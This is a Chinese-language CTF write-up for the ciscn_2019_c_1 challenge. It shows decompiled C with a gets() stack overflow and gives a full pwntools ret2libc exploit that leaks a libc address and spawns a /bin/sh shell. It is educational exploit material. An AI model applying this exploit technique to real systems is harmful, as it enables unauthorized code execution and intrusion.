buu-ciscn_2019-c_1 WP

// local variable allocation has failed, the output may be wrong!
int __cdecl main(int argc, const char **argv, const char **envp)
{
  int v4; // [rsp+Ch] [rbp-4h]

  init(*(_QWORD *)&argc, argv, envp);
  puts("EEEEEEE                            hh      iii                ");
  puts("EE      mm mm mmmm    aa aa   cccc hh          nn nnn    eee  ");
  puts("EEEEE   mmm  mm  mm  aa aaa cc     hhhhhh  iii nnn  nn ee   e ");
  puts("EE      mmm  mm  mm aa  aaa cc     hh   hh iii nn   nn eeeee  ");
  puts("EEEEEEE mmm  mm  mm  aaa aa  ccccc hh   hh iii nn   nn  eeeee ");
  puts("====================================================================");
  puts("Welcome to this Encryption machine\n");
  begin();
  while ( 1 )
  {
    while ( 1 )
    {
      fflush(0LL);
      v4 = 0;
      __isoc99_scanf("%d", &v4);
      getchar();
      if ( v4 != 2 )
        break;
      puts("I think you can do it by yourself");
      begin();
    }
    if ( v4 == 3 )
    {
      puts("Bye!");
      return 0;
    }
    if ( v4 != 1 )
      break;
    encrypt();
    begin();
  }
  puts("Something Wrong!");
  return 0;
}

int begin()
{
  puts("====================================================================");
  puts("1.Encrypt");
  puts("2.Decrypt");
  puts("3.Exit");
  return puts("Input your choice!");
}
int encrypt()
{
  size_t v0; // rbx
  char s[48]; // [rsp+0h] [rbp-50h]
  __int16 v3; // [rsp+30h] [rbp-20h]

  memset(s, 0, sizeof(s));
  v3 = 0;
  puts("Input your Plaintext to be encrypted");
  gets(s);
  while ( 1 )
  {
    v0 = (unsigned int)x;
    if ( v0 >= strlen(s) )
      break;
    if ( s[x] <= 96 || s[x] > 122 )
    {
      if ( s[x] <= 64 || s[x] > 90 )
      {
        if ( s[x] > 47 && s[x] <= 57 )
          s[x] ^= 0xFu;
      }
      else
      {
        s[x] ^= 0xEu;
      }
    }
    else
    {
      s[x] ^= 0xDu;
    }
    ++x;
  }
  puts("Ciphertext");
  return puts(s);
}

发现gets(s);这样就好办了，随后那个加密就不用管了。

看看程序里边有无system("\bin\sh")

![image-20191215140307281](/img/buu-ciscn_2019-c_1 WP/image-20191215140307281.png)

没有，那就只能通过libc来计算了

我们知道了lib，有了puts函数，所以我们可以leak libc的起始地址，计算libc地址，此时system和binsh都是嵌入到了内存当中的，所以我们就加上偏移即可调用

exp

from pwn import *
context.log_level = "debug"
context.arch = "amd64"
sh = process("./ciscn_2019_c_1")
#sh = remote("node3.buuoj.cn",25817)
elf = ELF("./ciscn_2019_c_1")
lib = ELF("/lib/x86_64-linux-gnu/libc.so.6") #ida里可以看见
sh.recvuntil("!")
sh.sendline("1")
sh.recvuntil("ted")
offset = 87 #ida双击gets(s)看得是0x50，加上前面的\x00就是80+8
pop_rdi_ret = elf.search(asm("pop rdi\nret\n")).next()
payload = '\x00' + offset * "a"
payload += p64(pop_rdi_ret)
payload += p64(elf.got['__libc_start_main'])
payload += p64(elf.plt['puts'])
payload += p64(0x400B28) #程序起始地址
sh.sendline(payload)
sh.recvuntil("Ciphertext")

__libc_start_main = u64(sh.recvuntil("\x7f")[-6:].ljust(8,'\x00'))
libc = __libc_start_main - lib.symbols['__libc_start_main']
system = libc + lib.symbols['system']
binsh = libc + lib.search("/bin/sh\x00").next()
sh.recvuntil("!")
sh.sendline("1")
payload = '\x00' + offset * "a"
payload += p64(pop_rdi_ret)
payload += p64(binsh)
payload += p64(system + 0x1b )
payload += p64(0xdeadbeef)
sh.sendline(payload)

log.success("__libc_start_main: " + hex(__libc_start_main))

sh.interactive()

「真诚赞赏，手留余香」

buu-ciscn_2019-c_1 WP

CATALOG

FEATURED TAGS